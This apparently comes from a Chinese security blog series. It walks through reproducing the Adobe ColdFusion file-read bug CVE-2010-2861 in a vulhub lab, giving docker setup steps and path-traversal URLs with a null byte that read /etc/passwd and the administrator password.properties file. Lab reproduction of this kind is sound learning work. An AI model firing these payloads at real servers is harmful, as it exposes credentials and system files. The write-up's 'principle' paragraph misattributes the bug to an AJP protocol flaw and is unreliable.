09 - vulhub - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
漏洞名称:Adobe ColdFusion 文件读取漏洞 (CVE-2010-2861)
简介:
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
影响版本
Adobe ColdFusion 8
Adobe ColdFusion 9
漏洞原理
由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。
漏洞复现
环境准备
靶机环境 139.196.87.102 (vulhub)
攻击机环境 192.168.8.137 (虚拟机 Ubuntu 20、Java1.8、Burp)
启动 Adobe ColdFusion 文件读取漏洞 环境
1.进入 vulhub 的 Adobe ColdFusion 路径
cd /usr/local/tools/vulhub/coldfusion/CVE-2010-2861
2.编译并启动环境
docker-compose up -d
3.查看环境运行状态
docker ps | grep vulhub
访问 your_ip:8500/CFIDE/administrator/enter.cfm 端口,针对靶场环境进行初始化,大概需要1-5分钟。
漏洞利用
POC
index.cfm?locale=../../../../../../../../../../etc/passwd%00en
/etc/passwd
文件的内容会直接显示在浏览器页面上,但是也会存在因为url编码无法读取的情况。
这里我们可以利用 burp 抓包,然后直接访问
http://139.196.87.102:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en
这里有个需要注意的地方,网上很多复现的文章写的是 ‘enter.cfm?locale=’ ,实际复现过程中我用的是 ‘index.cfm?locale’ 复现成功的。
还有个问题,就是我使用的是破解版的 burp ,因为这个原因,我在复制 POC 改数据包的时候
../../../
会变成 &/&/&
,导致我复现失败,同时我的 burp 还不能敲空格键!!! [垃圾复现文章害死人,破解版的 burp 同样害人不浅]
再继续尝试读取管理员密码
/CFIDE/administrator/index.cfm?locale=../../../../../../../lib/password.properties%00en
修复建议
根据官方提示升级至最新版
相关文章
- 代码审计-zzzphp代码执行漏洞getshell
- 代码审计-MetInfo CMS任意文件读取漏洞
- 从外网 log4j2 RCE 再到内网组合拳漏洞 CVE-2021-42287、CVE-2021-42278 拿到 DC
- Nexus Repository Manager 3(CVE-2019-7238) 远程代码执行漏洞分析和复现
- dedecmsV5.7 任意文件上传漏洞修复
- 文件包含漏洞防护与利用小技巧
- MSF实战——ms17-010漏洞的危害
- 06 - vulhub - Apache HTTPD 多后缀解析漏洞
- 05 - vulhub - Apache HTTPD 换行解析漏洞(CVE-2017-15715)
- WEB漏洞攻防 - 文件上传漏洞 - 配和文件解析漏洞绕过安全检测突破文件上传漏洞
- WEB漏洞攻防 - 文件上传漏洞 - 黑名单验证 [验证文件后缀名]
- Ewebeditor最新漏洞及漏洞大全
- 本地文件包含漏洞利用姿势
- 20.Ecshop 2.x/3.x SQL注入/任意代码执行漏洞
- 3. XML实体注入漏洞的利用与学习
- 1.文件上传漏洞简介
- 物联网安全——电信光猫的各种漏洞,未授权访问/认证绕过,RCE等
- glassfish漏洞利用示例,通过zoomeye进行漏洞发现
- WEB漏洞攻防 - 文件上传漏洞 - 文件上传漏洞必知必会
- WEB漏洞攻防 - 文件上传漏洞 - 中间件类应用场景 - [VULHUB 靶机]Weblogic任意文件上传漏洞[CVE-2018-2894]
- OpenSSH 命令注入漏洞(CVE-2020-15778)